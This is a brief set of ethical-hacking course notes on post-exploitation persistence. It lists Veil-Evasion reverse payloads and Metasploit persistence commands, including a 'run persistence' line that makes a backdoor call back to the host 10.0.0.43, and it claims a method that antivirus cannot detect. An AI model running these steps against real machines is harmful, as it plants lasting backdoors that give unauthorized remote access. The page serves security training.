Ethical Hacking - POST EXPLOITATION(2)

MAINTAINING ACCESS - Methods

1. Using a veil-evasion

  • Rev_http_service
  • Rev_tcp_service
  • Use it instead of a normal backdoor.
  • Or upload and execute from meterpreter.
  • Does not always work.

2. Using persistence module

  • run persistence -h
  • Detectable by antivirus programs.

Ethical Hacking - POST EXPLOITATION(2)_第1张图片

run persistence -U -i 20 -p 80 -r 10.0.0.43

 

3. Using Metasploit + veil-evasion -> More robust + undetectable by Antivirus

  • > use exploit/windows/local/persistence

Ethical Hacking - POST EXPLOITATION(2)_第2张图片

  • > set session [session id]

Ethical Hacking - POST EXPLOITATION(2)_第3张图片

  • > set exe::custom[backdoor location]

Ethical Hacking - POST EXPLOITATION(2)_第4张图片

  • >exploit

 

你可能感兴趣的:(Ethical Hacking - POST EXPLOITATION(2))